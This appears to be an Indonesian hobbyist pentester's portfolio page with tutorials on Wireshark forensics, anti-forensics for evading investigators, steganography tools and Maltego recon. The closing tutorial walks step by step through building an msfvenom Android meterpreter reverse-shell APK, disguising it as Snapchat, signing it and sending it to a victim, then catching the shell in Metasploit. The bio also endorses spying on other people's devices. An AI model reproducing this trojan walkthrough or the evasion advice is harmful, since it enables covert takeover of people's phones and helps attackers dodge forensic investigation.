Hello World!

“Flying down a tunnel of 1s and 0s is not how hacking is really done"

“Behind every successful Coder there an even more successful De-coder to understand that code."

“A hacker does for love what others would not do for money"

“A hacker to me is someone creative who does wonderful things"

"Hacking is not a crime, it's a profession till the time you play with it safely "

I'm Diddo Adding Adove,
Owner & Pentester
from zvilsec

I have rich experience in security system & internet security. Also I am journalist for technology and other stuff section. Also i love learning a new language. Feel free to contact me writing an email with your project idea.

What I Do
Pentester

I like to test my system even somebody`s system for fun and to learn.

Script Kiddies

I enjoyed for changing someone code to develop it in to a new one.

Web Design

Literally i build website not from 0 but i like to use some code to make in to a new one.

Spying

I love to spy someone`s device,it makes me know about their secret even it was a inappropriate action.

Writing

Writing is my other hobby in my life.

Marketing

Someday i will become a great marketer

Recent Works

sasa

a

Cara Forensik Jaringan Dengan Wireshark


Artikel kali ini akan fokus pada forensik jaringan. Dengan kata lain, apa yang bisa dipelajari penyidik ​​forensik jaringan tentang penyerang selama penyelidikan dan bagaimana caranya.

Langkah 1 Buka Wireshark

Meskipun ada banyak alat untuk melakukan analisis dan investigasi jaringan, sejauh ini, alat yang paling banyak digunakan adalah Wireshark. Ini adalah alat analisis jaringan gratis yang bisa digunakan untuk Windows, Unix, OS X dan Linux, dan kamu bisa mendapatkannya dari sini. Jika  kamu menggunakan kali linux atau semacamnya kamu gak perlu install lagi karena sudah ada.

Kamu dapat memulai Wireshark dari menu Kali linux dengan masuk ke menu -> sniffing & spoofing-> dan klik pada Wireshark.


Langkah 2 Ambil Tangkapan Langsung
Selanjutnya, kita perlu menjalankan Wireshark, yang mampu melakukan analisis pada pcap dan file tangkapan lainnya, serta tangkapan langsung. Mari kita lakukan penangkapan langsung. Klik pada Capture pada Menu di bagian atas dan dan klik start.

Langkah 3 Masalah
Inilah masalah yang kita hadapi.

Beberapa mengeluh bahwa ada hal-hal aneh yang terjadi di komputernya. Browser-nya terus mengubah halaman rumahnya menjadi halaman yang terus mengatakan kepadanya bahwa komputernya terinfeksi virus, sementara juga mengatakan kepadanya bahwa dia perlu membeli program antivirus. Kita semua pernah melihat ini pada satu waktu atau yang lain.

Selain itu, komputernya berjalan lambat dan berbagai iklan terus muncul. Sesuatu telah menginfeksi sistem ini. Mari kita lihat apa yang bisa kita uraikan tentang situasi ini.

Langkah 4 Live Capture

Kita mulai dengan mengendus lalu lintas di jaringan dan kita dapat melihat paket langsung berjalan seperti itu di bawah ini.


Perhatikan bahwa Wireshark memiliki tiga jendela. Jendela atas menunjukkan kepada kita setiap paket dan beberapa informasi dasar tentangnya. Jendela tengah memungkinkan kita untuk melihat setiap bit dan byte dari header paket. Jendela bawah menunjukkan kepada kita isi paket dalam heksadesimal dan ASCII.

Langkah 5 Remote Attemps

Kolom paling kiri menyebutkan paket-paket sesuai urutan kedatangannya. Mari kita lihat paket 147 di bawah ini. Kita dapat melihat paket messenger dari perangkat di suatu tempat di Internet. Mari kita lihat lebih dekat paket ini dengan mengkliknya. Ketika kita melakukannya, detailnya muncul di jendela tengah berwarna putih.


Karena layanan messenger dinonaktifkan pada jaringan ini, tidak ada yang terjadi. kita dapat memverifikasi itu dengan melihat paket berikutnya, yang merupakan paket "Destination Unreachable" ICMP yang dikirim kembali ke IP yang meminta koneksi messenger. Ini adalah aktivitas mencurigakan.

Langkah 6 Filter lalu lintas


Dengan banyaknya lalu lintas yang berlalu, kita perlu memfilter lalu lintas sehingga kita hanya melihat lalu lintas yang menarik bagi kita. Jika kita mengklik lalu lintas antara 216.49.88.118, kita dapat melihat bahwa alamat ini adalah pembaruan antivirus dari McAfee (catatan di bawah) di bagian ASCII referensi ke mcafee.com).

Karena lalu lintas ini tidak berbahaya, kami dapat menghapusnya dari tampilan kami dengan memfilternya. Dalam hal ini, kami ingin melihat semua yang tidak berasal dari alamat IP 216.49.88.118. Kita dapat menempatkan filter berikut ke jendela filter. Ketika sintaks memperbaikinya, latar belakang jendela akan berubah menjadi hijau. Sintaks yang tepat untuk mengecualikan alamat IP adalah:

    ! ip.addr == 216.49.88.118


Sekarang kita telah menghapus lalu lintas dari tampilan kami yang berasal dari alamat yang tidak berbahaya. Ini membantu kami memusatkan perhatian pada lalu lintas lain yang berpotensi jahat.

Pada tangkapan layar di bawah, kami telah berhasil menyaring lalu lintas ke dan dari McAfee.

Langkah 7
Permintaan DNS
Sekarang mari kita lihat beberapa paket. Dalam tangkapan layar ini, kita dapat melihat bahwa komputer klien kita (216.148.227.68) dalam paket kedua menunjukkan "permintaan standar" dengan protokol DNS ke virtumonde.com. Ini mencurigakan!

Jika kita geser ke bawah ke paket 386, kita dapat melihat host klien keluar ke server virtumonde.com dan meminta unduhan. Ketika kita mengklik pada paket ini dan memperluas protokol HTTP-nya di jendela tengah, kita dapat melihat "pembaruan.virtumonde.com \ r \ n."

Ini adalah aktivitas yang SANGAT mencurigakan dan mungkin menunjukkan bahwa sistem klien kita telah terinfeksi dengan rootkit atau spyware dan melaporkan kembali ke server home.

Apa itu Digital Forensik: Alat & Teknik


Apa itu Digital Forensik ?
 
Digital Forensik  adalah bidang yang bertanggung jawab atas intrusi digital atau kejahatan komputer lainnya. Dengan menggunakan berbagai macam teknik untuk mendapatkan akses ke pelaku.

Bergantung pada konsep dasar bahwa setiap kali intrusi digital atau kejahatan dilakukan, pelaku secara tidak sengaja meninggalkan sedikit di belakangnya untuk ditemukan oleh penyidik. "Bit" ini bisa berupa entri dalam file log, perubahan pada registri, peretasan perangkat lunak, malware, sisa-sisa file yang dihapus, dll. Semua ini dapat memberikan petunjuk dan bukti untuk menentukan identitas mereka dan mengarah pada penangkapan hacker.

Sebagai seorang hacker, semakin banyak yang kamu ketahui dan pahami tentang digital forensik , semakin baik kamu dapat menghindari teknik forensik standar dan bahkan menerapkan tindakan anti-forensik untuk melawan penyelidik.

Alat Digital Forensik
Sama seperti dalam peretasan, ada sejumlah alat perangkat lunak untuk melakukan digital forensik . Bagi peretas, mengenal alat-alat ini dan cara kerjanya sangat penting untuk menghindarinya. Kebanyakan penyelidik forensik digital bergantung pada tiga suite digital forensik utama.
  1. Guidance Software's EnCase Forensic
  2. Access Data's Forensic Tool Kit (FTK)
  3. Prodiscover

Ketiga suite ini terdiri dari beberapa alat dan fitur pelaporan dan bisa jadi cukup mahal. Sementara suite ini banyak digunakan oleh penegak hukum, mereka menggunakan teknik yang sama atau serupa dengan suite open-source gratis tanpa antarmuka yang mewah.

Dengan menggunakan open source dan suite gratis, kita dapat memahami bagaimana alat seperti EnCase bekerja tanpa biaya. EnCase adalah alat yang paling banyak digunakan oleh penegak hukum, tetapi belum tentu yang paling efektif dan canggih. Alat-alat ini dirancang untuk ramah pengguna, efisiensi, sertifikasi, pelatihan, dan pelaporan.

Ada sejumlah suite forensik open-source gratis, termasuk tiga berikut.

    The Sleuthkit Kit (TSK)
    Spiral
    Knoppix

 


Kita akan melihat masing-masing suite ini untuk lebih memahami apa yang dapat dilihat dan ditemukan oleh penyelidik forensik digital tentang intrusi dan pelaku.

Alat Forensik Tersedia di Kali Linux

Selain itu, ada sejumlah besar alat individual yang tersedia untuk digital    forensik , beberapa di antaranya tersedia di distribusi Kali.


Beberapa alat yang lebih baik di Kali Linux termasuk yang berikut, di antara banyak lainnya.

    sleuthkit
    truecrypt
    hexedit
    autopsi
    iphoneanalyzer
    rifiuti2
    ptk
    exiftool
    evtparse.pl
    fatback
    pisau bedah
    dc3dd
    driftnet
    timestomp

Apa Yang Dapat Dilakukan Digital Forensik ?

Digital Forensik dapat melakukan banyak hal, yang semuanya harus disadari oleh para peretas. Di bawah ini adalah daftar beberapa hal.

  •     Memulihkan file yang dihapus, termasuk email
  •     Tentukan komputer, perangkat, dan / atau perangkat lunak apa yang membuat file, perangkat lunak, dan / atau serangan berbahaya
  •     Telusuri IP sumber dan / atau alamat MAC serangan
  •     Lacak sumber malware dengan tanda tangan dan komponennya
  •     Tentukan waktu, tempat, dan perangkat yang mengambil gambar
  •     Lacak lokasi perangkat yang diaktifkan ponsel (dengan atau tanpa GPS diaktifkan)
  •     Menentukan waktu file diubah, diakses atau dibuat (MAC)
  •     Meretas kata sandi pada hard drive, file, atau komunikasi yang dienkripsi
  •     Tentukan situs web mana yang dikunjungi pelaku dan file apa yang dia unduh
  •     Tentukan perintah dan perangkat lunak apa yang telah digunakan tersangka
  •     Ekstrak informasi penting dari memori yang tidak stabil
  •     Tentukan siapa yang meretas jaringan nirkabel dan siapa pengguna yang tidak sah

Dan itu hanya beberapa hal yang dapat kamu lakukan dengan digital forensik !

Apa itu Anti-Forensik?
Anti-forensik adalah teknik yang dapat digunakan untuk mengaburkan informasi dan menghindari alat dan teknik penyelidik forensik. Beberapa teknik ini meliputi yang berikut ini.

  • Menyembunyikan Data: Menyembunyikan data dapat mencakup hal-hal seperti enkripsi dan stegonografi.
  • Artifact wiping: Setiap serangan meninggalkan tanda tangan atau artefak di belakang. Kadang-kadang bijaksana untuk mencoba untuk menghapus artefak ini dari mesin korban sehingga tidak meninggalkan jejak kisah bagi penyelidik.
  • Kebingungan Jejak: Seorang penyelidik forensik yang layak dapat melacak hampir semua serangan jarak jauh ke alamat IP dan / atau alamat MAC. Kebingungan jejak adalah teknik yang mengarahkan mereka ke sumber serangan lain, daripada serangan yang sebenarnya.
  • Ubah stempel waktu: Ubah stempel waktu file (modifikasi, akses, dan ubah) untuk menghindari deteksi oleh alat forensik.



Cara Menyembunyikan File Pada Gambar Atau Audio


Steganografi adalah proses menyembunyikan file, gambar, video, teks di dalam file lain. Seperti yang disebutkan dalam Wikipedia, Steganografi merupakan kombinasi dari dua kata Yunani, steganos diartikan tertutup, disembunyikan, atau dilindungi, dan graphein yang memiliki arti menulis. Sumber mengatakan bahwa metode ini pertama kali dipakai oleh Histiaeus, seorang raja Yunani kuno, pada tahun 440BC. Dia mencukur kepala pelayannya yang paling tepercaya, dan menandai pesan rahasia itu di kepalanya. Setelah rambut itu tumbuh kembali, ia mengirim pelayan itu ke salah satu pengikut untuk menyampaikan pesan yang memiliki beberapa informasi mengenai serangan yang akan datang ke Yunani. Sekarang, di zaman modern, Steganografi telah berkembang, jauh lebih baik dan banyak digunakan untuk mengirim dan menerima pesan rahasia digital dengan menyembunyikannya ke dalam file lain. Untuk detail lebih lanjut tentang Steganografi, lihat tautan ini. Sekarang mari kita lihat cara menyembunyikan file di dalam gambar di Linux.

Disclaimer:

Steganografi adalah topik yang sangat luas. Tutorial ini hanya mencakup cara menyembunyikan file di dalam gambar, yang merupakan konsep inti dari Steganografi. Tolong jangan berasumsi bahwa ini tidak dapat dipatahkan oleh pakar keamanan mana pun. Metode yang dijelaskan di sini sangat mendasar, sehingga bahkan profesional keamanan menengah dapat dengan mudah memecahkannya dalam beberapa jam. Langkah-langkah yang dijelaskan di bawah ini murni untuk tujuan pendidikan. Kami tidak bertanggung jawab atas penyalahgunaan apa pun.

Sembunyikan file di dalam gambar di Linux

Kita dapat menyembunyikan file di dalam gambar dengan metode yang berbeda. Di sini saya telah memberikan 5 metode.

Metode 1

Metode ini tidak memerlukan perangkat lunak tambahan apa pun. Hanya pengetahuan dasar perintah Linux sudah cukup. Namun metode ini perlu dilakukan pada linux 64 bit.

Saya punya satu file gambar bernama image.jpg dan direktori yang disebut sk. Di dalam direktori ini, ada file bernama secret.txt yang memiliki beberapa pesan rahasia. Ini adalah file yang akan kita tanam di file image.jpg. Anda dapat menempatkan sejumlah file yang ingin Anda sembunyikan di dalam direktori ini. Kemudian, saya akan memampatkan sk direktori dan menyimpannya sebagai secret.zip untuk menjadikannya sebagai file tunggal. Akhirnya, saya akan menggabungkan file zip (secret.zip) dan file gambar (image.jpg) menggunakan perintah cat dan menyimpannya sebagai ostechnix.jpg.

Untuk lebih jelasnya,

    image.jpg - File gambar acak.
    sk - Direktori yang berisi semua file rahasia.
    secret.zip - Arsip direktori sk.
    ostechnix.jpg - File gambar keluaran yang berisi secret.zip dan image.jpg.

Langkah 1: Masukkan file gambar dan direktori dalam folder. Saya telah menempatkan keduanya di folder Dokumen.

Langkah 2: Pindahkan semua file yang ingin Anda sembunyikan di dalam folder "sk". Kemudian, kompres folder ini dan simpan sebagai "secret.zip". Untuk mengompres folder, klik kanan padanya, dan pilih kompres.

Langkah 3: Selanjutnya buka Terminal. Pergi ke lokasi di mana kamu menyimpan file zip dan gambar (Dalam kasus ini adalah Dokumen). Akhirnya, gabungkan file secret.zip dan test.jpg, dan simpan sebagai ostechnix.jpg menggunakan perintah cat.

$ cd Dokumen

$ cat image.jpg secret.zip> ostechni
x.jpg


Itu dia. Kami sekarang telah menyembunyikan file rahasia di dalam ostechnix.jpg. Ini adalah file penting. Hapus saja semua file lain kecuali ostechnix.jpg.

Ostechnix.jpg akan terlihat seperti file gambar biasa dan siapa pun dapat melihatnya menggunakan aplikasi penampil gambar apa pun. Tapi, mereka mungkin tidak tahu file ini memiliki beberapa file rahasia di dalamnya.

Untuk melihat file yang tersembunyi di dalam file gambar ostechnix.jpg, buka saja kompres menggunakan perintah berikut:

$ unzip ostechnix.jpg

Atau,

$ unzip -t ostechnix.jpg


Output sampel:

Archive: ostechnix.jpg
[ostechnix.jpg] warning: 712139 additional bytes at the beginning or inside the zipfile
(Anyway trying to process)
make: sk /
inflate: sk / secret.txt


Seperti yang kamu lihat di output di atas, sk direktori yang memiliki file rahasia di dalamnya telah diekstraksi. Sekarang, kembali ke folder dan periksa isinya. kamu akan melihat semua file di sana.

Salah satu kelemahan dari metode ini adalah kita tidak dapat menambahkan frasa sandi apa pun ke file gambar. Jangan khawatir! Dalam metode berikut, kita dapat menambahkan frasa sandi ke file output.

Metode 2 - menggunakan Steghide

Steghide adalah utilitas baris perintah yang membantu kita menyembunyikan data rahasia di dalam file gambar atau audio. Ini mendukung file JPEG, BMP, WAV dan AU.

Steghide tersedia di repositori default dari banyak distribusi Linux.

Di Arch Linux dan variannya, kamu dapat menginstalnya menggunakan perintah:

$ sudo pacman -S steghide

Di Debian, Ubuntu:

$ sudo apt install steghide


Sekarang kamu dapat menyembunyikan file rahasia di dalam gambar atau audio seperti di bawah ini. Saya berasumsi kamu telah meletakkan file rahasia yang ingin kamu enkripsi dan file gambar atau audio di folder yang sama. Jika kamu meletakkannya di folder yang berbeda, kamu harus memberikan path lengkap dalam perintah berikut.

$ steghide embed -ef secret.txt -cf ostechnix.jpg

Kamu akan diminta memasukkan kata sandi.

Masukkan frasa sandi:
Masukkan kembali frasa sandi:
menanamkan "secret.txt" di "ostechnix.jpg" ... selesai

Dalam contoh di atas, saya telah menyematkan file teks bernama secret.txt ke file gambar bernama ostechnix.jpg. Kamu sekarang dapat menghapus file secret.txt asli. Karena, kita hanya menyematkan di dalam file gambar. Jika kamu ingin menyematkan banyak file, letakkan di satu folder dan zip, lalu sembunyikan seperti dijelaskan di atas.

Untuk mengekstrak file rahasia dari gambar, jalankan:

$ steghide extract -sf ostechnix.jpg
Masukkan frasa sandi untuk mengekstraknya:

Masukkan frasa sandi:
menulis data yang diekstraksi ke "secret.txt".

Untuk detail lebih lanjut, lihat halaman manual,

$ man steghide

Metode 3 - menggunakan Outguess

Outguess adalah alat stegnografis baris perintah lain untuk menyembunyikan file rahasia di dalam gambar. Saat ini, mendukung format gambar PPM, PNM, dan JPEG.

Untuk menginstalnya di Debian, Ubuntu dan sistem berbasis DEB lainnya, jalankan:

$ sudo apt install outguess

Setelah terinstal, pergi ke lokasi di mana kamu menyimpan file rahasia dan gambar dan menanamkan file rahasia ke dalam gambar menggunakan perintah berikut:

$ outguess -d secret.txt ostechnix.jpg output.jpg

Di sini, file output.jpg adalah yang memiliki file data rahasia kita. Amankan dan hapus yang lainnya.

Kamu juga dapat menambahkan frasa sandi ke file keluaran seperti di bawah ini.

$ outguess -k "kunci rahasia saya" -d secret.txt ostechnix.jpg output.jpg


Ganti "kunci rahasia saya" dengan frasa sandi kamu sendiri.

Untuk mengekstrak file, cukup lakukan:

$ outguess -r output.jpg secret.txt

Jika kamu telah menggunakan kata sandi, maka gunakan perintah ini sebagai gantinya:

$ outguess -k "kunci rahasia saya" -r output.jpg secret.txt

Untuk detail lebih lanjut, lihat halaman manual.

$ man outguess


Metode 4 - menggunakan Stegosuite

Stegosuite adalah alat steganografi grafis untuk menyembunyikan file di dalam gambar. Ini adalah alat steganografi gratis dan open source yang ditulis dalam Java. Ini menggunakan metode enkripsi AES untuk menanamkan data. Ini mendukung format gambar BMP, GIF dan JPG.

Untuk menginstalnya di Debian, Ubuntu dan sistem berbasis DEB lainnya, jalankan:

$ sudo apt install stegosuite

Setelah terinstal, luncurkan Stegosuite dari Dash atau Menu.
antarmuka stegosuite


Klik File -> Buka dari bilah menu dan pilih gambar yang ingin Anda gunakan untuk menyembunyikan file. Kemudian masukkan pesan di kolom pertama. Klik kanan pada kolom kedua dan pilih "Tambah file ..". Terakhir, masukkan frasa sandi di kolom ketiga.

Terakhir, klik tombol embed di bagian bawah antarmuka Stegosuite.

Sekarang file gambar baru akan dibuat dengan nama "filename_embed" di folder yang sama di mana Anda telah memilih gambar. Misalnya, jika Anda telah memilih gambar yang disebut "image.jpg" dari folder Documents, file gambar baru akan dibuat dengan nama "image_embed.jpg" di folder Documents itu sendiri.

Untuk mengekstrak file rahasia dari gambar, cukup buka lagi di antarmuka Stegosuite, masukkan frasa sandi dan klik tombol Ekstrak.


Semua file akan diekstraksi dalam folder yang sama.

Untuk detail lebih lanjut, lihat situs web Stegosuite.

Metode 5 - menggunakan Steg

Steg adalah alat steganografi sederhana, lintas platform, dan grafis, ditulis menggunakan bahasa pemrograman C ++. Ini adalah perangkat lunak portabel, jadi unduh saja, bawa ke mana saja dan mulailah menggunakannya dalam waktu singkat, apa pun sistem operasi yang kamu gunakan. Steg mendukung format gambar JPEG, JPG, TIFF, PNG, dan BMP. Menggunakan teknik Steganografi dan Kriptografi untuk menyembunyikan data di dalam gambar terkompresi atau tidak terkompresi.

Pemakaian

Klik tautan ini untuk mengunduh aplikasi Steg. Ini tersedia untuk arsitektur 32 dan 64 bit.

Atau, cukup gunakan perintah berikut untuk mengunduhnya tergantung pada arsitektur yang kamu gunakan.

Untuk 64 bit:

$ wget https://googledrive.com/host/0B-_yxJMDtRxyUExLZzZ3S2VDbjQ/steg-v1.0.0.2-linux64.tgz

Untuk 32 bit:

$ wget https://googledrive.com/host/0B-_yxJMDtRxyRDNGNk1YcXR0UTg/steg-v1.0.0.2-linux32.tgz


Setelah mengunduh, ekstrak menggunakan perintah:

$ tar -xvzf steg-v1.0.0.2-linux64.tgz

Pergi ke direktori Steg:

$ cd steg-v1.0.0.2-linux64 /

Dan, ketikkan perintah berikut untuk menjalankannya.

$ ./steg.sh


Klik Ya untuk menerima perjanjian lisensi.

Klik OK untuk melanjutkan.

Beginilah tampilan antarmuka aplikasi Steg.

Sekarang, mari kita sembunyikan beberapa data di dalam gambar.

Untuk melakukannya, buka File -> Buka gambar umum atau Buka gambar JPEG. Pastikan kamu telah memilih gambar berukuran besar untuk menyimpan lebih banyak data di dalamnya. Semakin besar gambar yang kamu pilih, semakin banyak file yang dapat kamu simpan di dalam gambar.

Setelah kamu membuka gambar, gambar asli dan gambar yang dimodifikasi (gambar keluaran) akan ditampilkan masing-masing di panel kiri dan kanan. Juga, Ini menampilkan ukuran yang tersedia untuk menyimpan data di dalam gambar di sudut kanan bawah.

Sekarang, pergi ke hide -> hide Data dari bilah menu atas. Pilih file yang ingin kamu sembunyikan. Pastikan file yang kamu pilih lebih kecil dari ruang yang tersedia di gambar yang dimodifikasi. Setelah menambahkan data, kamu akan melihat kotak dialog konfirmasi yang mengatakan: Data berhasil disembunyikan.

Inilah bagian yang penting. Kamu dapat memilih berbagai mode enkripsi.

    Auto: Data akan dienkripsi, tetapi kamu tidak perlu PassPhrase atau kunci untuk mengekstrak data.
    Symmetric: Kamu harus memberikan PassPhrase untuk mengenkripsi data, dan penerima akan memerlukan PassPhrase yang sama untuk mengekstraknya.
    Asymmetric unsigned: ketika kamu ingin menyembunyikan data (kamu adalah pengirim), hanya kunci publik penerima yang diperlukan. Saat kamu ingin mengekstrak data (kamu adalah penerima), hanya kunci pribadi kamu yang diperlukan.
    Asymmetric signed: ketika kamu ingin menyembunyikan data (kamu adalah pengirim) kunci publik penerima dan kunci pribadi kamu diperlukan. Saat kamu ingin mengekstrak data (kamu adalah penerima), hanya kunci pribadi kamu yang diperlukan tetapi kunci publik pengirim diminta. Jika kamu tidak memberikan kunci publik pengirim, pada akhir proses ekstraksi, kamu akan diperingatkan bahwa identitas pengirim tidak diverifikasi. Jika kamu memberikan kunci publik pengirim, kamu akan diberi tahu jika verifikasi tanda berhasil.

kamu dapat memilih metode kriptografi pilihan Anda.

Untuk memilih metode kriptografi tertentu, pergi ke Edit -> Configuration dari menu bar. Metode kriptografi default adalah otomatis. Anda juga dapat menyematkan beberapa pesan pada file jika kamu mau.


Setelah semuanya baik-baik saja, klik tombol Simpan di bilah alat, dan simpan di lokasi yang kamu inginkan.

Selesai! Data gambar dienkripsi di dalam gambar. Gambar ini akan terlihat seperti gambar biasa. Kamu dapat melihatnya menggunakan aplikasi gambar apa pun.

Untuk mengekstrak data tersembunyi, cukup buka gambar terenkripsi di aplikasi Steg. Untuk melakukannya, buka Ekstrak -> Ekstrak data dari bilah menu.

Pilih lokasi tempat untuk menyimpan data kamu. Selesai!

Itu dia. Kamu sekarang dapat melihat data.

Seperti yang kamu lihat, ini sangat mudah diikuti dan tidak memerlukan keahlian khusus. Cukup buka gambar, sembunyikan beberapa data rahasia, dan bagikan.

Untuk detail lebih lanjut tentang Steg, lihat situs web resmi.

Cara Recon Network Dengan Maltego


Sebelum kita mencoba untuk mengeksploitasi target apa pun, pertama kita perlu melakukan recon yang tepat. Tanpa melakukan recon, kamu kemungkinan akan membuang-buang waktu dan energi. Dalam panduan sebelumnya, saya telah menunjukkan banyak cara untuk melakukan recon dengan Nmap atau hping3, recon dengan mengeksploitasi DNS atau SNMP, dan banyak lainnya.

Dalam tutorial ini, kita akan menggunakan alat yang disebut Maltego, yang dikembangkan oleh Paterva, yang dapat melakukan banyak tugas dengan satu pemindaian sederhana. Ada edisi komunitas yang dibangun di Kali Linux yang memungkinkan melakukan 12 pemindaian tanpa membeli Maltego. Ini mampu mengumpulkan sejumlah besar informasi tentang target dalam sekali sapuan domain.

Menggunakan Maltego di Kali untuk Merekonstruksi Jaringan Target

Maltego mampu mengumpulkan informasi tentang jaringan atau individu; di sini kita akan fokus pada yang pertama yaitu tentang jaringan. Kita akan melihat pengumpulan info tentang semua subdomain, rentang alamat IP, info WHOIS, semua alamat email, dan hubungan antara domain target dan yang lainnya.

Langkah 1Buka Maltego & Daftar

Mari kita mulai dengan menyalakan Kali dan kemudian membuka Maltego. Maltego dapat ditemukan di banyak tempat di Kali, tetapi cara termudah untuk sampai ke sana adalah pergi ke Aplikasi -> Kali Linux -> Top 10 Alat Keamanan. Kemudian, di antara Top 10, Anda akan menemukan Maltego di nomor 5, seperti yang ditunjukkan pada gambar di bawah.



Saat kamu membuka Maltego, kamu harus menunggu sebentar untuk memulai. Setelah selesai memuat, kamu terlebih dulu login/daftar akun di Maltego.



Silakan mendaftar dan simpan dan ingat kata sandimu agar mudah waktu login selanjutnya

Langkah 2 Pilih Mesin & Parameter

Setelah berhasil mendaftar dan masuk ke Maltego, kita harus memutuskan jenis "mesin" apa yang ingin kita jalankan untuk target kita. Dalam bahasa Maltego, mesin hanyalah jenis footprinting yang ingin kita lakukan terhadap target kita. Di sini, kami fokus pada jejak jaringan, jadi pilihan kami adalah:

    Company Stalker (ini mengumpulkan informasi email)
    Footprint L1 (pengumpulan informasi dasar)
    Footprint L2 (pengumpulan informasi dalam jumlah sedang)
    Footprint L3 (pengumpulan informasi yang intens dan terlengkap)


Mari kita pilih Footprinting L3 yang akan mengumpulkan sebanyak mungkin informasi; ini juga pilihan yang paling memakan waktu, jadi waspadalah.

Langkah 3 Pilih Target

Sekarang kita telah memilih jenis mesin untuk footprinting kita, kita harus memilih target. Mari kita pilih SANS, salah satu perusahaan pelatihan dan konsultan keamanan TI terkemuka di dunia.

Sekarang, klik "Selesai" dan biarkan Maltego melakukan tugasnya.

Langkah 4 Hasil

Maltego sekarang akan mulai mengumpulkan info tentang domain target sans.org, dan menampilkannya di layar. Pada tangkapan layar di bawah, kita dapat melihat bahwa Maltego telah mengumpulkan alamat email dari situs tersebut, sementara itu mengumpulkan server nama dan server surat.

Terakhir, kita bisa mengklik "Bubble View" ketika Maltego selesai dan melihat semua hubungan antara target kami dan subdomainnya serta situs yang tertaut.

Maltego adalah alat yang sangat baik untuk melakukan pengintaian jaringan pada target potensial, memungkinkan untuk melakukan berbagai jenis recon dalam satu pemindaian dengan satu alat tunggal. Maltego juga mampu melakukan pengintaian individu.

Cara Menyamarkan Backdoor APK Dengan APKTOOL

Kamu mungkin sudah membuat apk backdoor (paket android) sebelumnya pada kali, itu dilakukan dengan cara yang sama seperti kamu membuat exe backdoor. Yang dibuat dengan perintah msfvenom.

Dalam tutorial singkat ini aku akan menunjukkan cara mengubah ikon, izin, dan nama aplikasi, agar lebih meyakinkan bagi targetmu.  

Langkah 1 Membuat Apk Backdoor

Jadi, mari kita mulai dengan membuat apk pada meterpreter.  Masukkan kode ini di terminal

msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk

Ini akan membuat app.apk di folder kamu saat ini.

Sekarang sampai pada bagian yang sulit.

Langkah 2 Menginstal Apktool

Kamu harus menginstal Apktool pada sistem, saya menggunakan windows untuk ini, tetapi harus dilakukan dengan cara yang sama di linux / mac os.  Karena ini berbeda untuk semua orang, saya tidak akan menginstal alat ini.  Lihatlah di situs web mereka untuk sistem kamu.

Perhatikan bahwa Apktool diinstal secara default di reverse engineering toolkit dari Kali linux!

Langkah 3 Dkompilasi Apk 

Pertama periksa apakah kamu dapat menjalankan apktool dengan benar dengan menjalankan perintah:

apktool

Jika kamu melihat menu bantuan artinya instalasi sudah benar.  Sekarang jalankan perintah

apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder

apktool sekarang akan mendekompilasi app.apk ke /pathtoyourfolder/folder.  Di folder baru ini kamu akan menemukan beberapa file. Antara lain:

Folder 'res'

File AndroidManifest.xml

Folder 'smali'

Folder 'asli'

File apktool.yml

Langkah 4 Memodifikasi File

Untuk tutorial ini kita hanya akan memodifikasi file AndroidManifest.xml dan folder 'res'.  Pertama, buka AndroidManifest.xml dengan editor teks.  Saya menggunakan Notepad ++.

Kamu akan melihat sesuatu seperti ini:

Gambar melalui imgur.com

Pertama, mari kita hapus beberapa baris yang mungkin tidak kita perlukan dan akan memberi pengguna peringatan tambahan.


Sekarang kita masuk ke folder 'res'.  Di sini kamu akan menemukan folder 'values', masuk ke dalamnya.  Sekarang kamu akan menemukan 2 file, 1 bernama strings.xml, sekali lagi, buka file xml ini dengan editor teks.

kamu akan menemukan baris <string name="appname">MainActivity</string>

Ubah '' 'MainActivity' 'menjadi nama aplikasi yang kamu sukai, saya memilih nama '' Snapchat ''.  Tetapi pilihlah nama yang menurut kamu cocok.

Simpan file dan kembali ke folder / res /.
Buat 3 folder bernama:

drawable-ldpi-v4

drawable-mdpi-v4

drawable-hdpi-v4

Sekarang kamu perlu menemukan ikon yang sesuai untuk aplikasimu.

Saya menggunakan Android Asset Studio situs web dan resizeimage.net

Tujuannya adalah untuk mendapatkan file 3 png dengan ukuran berikut:

 36x36 (piksel) untuk folder ldpi

 48x48 untuk folder mdpi

 72x72 untuk folder hdpi

Beri nama file png ini semua 'icon.png' dan letakkan di folder yang sesuai.

Langkah 5 Menyusun Aplikasi 

Proses ini sangat mudah.  Kembali ke terminal apktool dan masukkan perintah berikut:

apktool b /pathtoyourfolder/folder

Ini akan membuat apk di folder 'dist' yang baru dibuat (ditemukan di apktool b / pathtoyourfolder / folder)

Langkah 6 Signing Apk

Saya menggunakan zip untuk signing apk atau jika itu tidak coba unduh file ini.  Unzip file dan cd ke folder baru, sekarang gunakan perintah:

java -jar signapk.jar Certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk

Ini akan membuat file bernama signed.apk di folder baru yang dapat kamu kirim ke korban dan mereka akan melihat nama dan ikon aplikasi yang dikenal.

Langkah 7 Exploit

 Sekarang bagian terakhir,
 buka metasploit menggunakan:

 msfconsole
Open multi/handler
use multi/handler
set the payload
set payload
android/meterpreter/reversetcp

set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)

and exploit
exploit

Sekarang setelah membuka aplikasi, kamu akan mendapatkan shell meterpreter yang masuk.
e
Contact Me

Adress/Street

Kalimantan street, City of Jember Indonesia

Phone number

+(62) 823 3486 3080

Email

ahdeen@bk.ru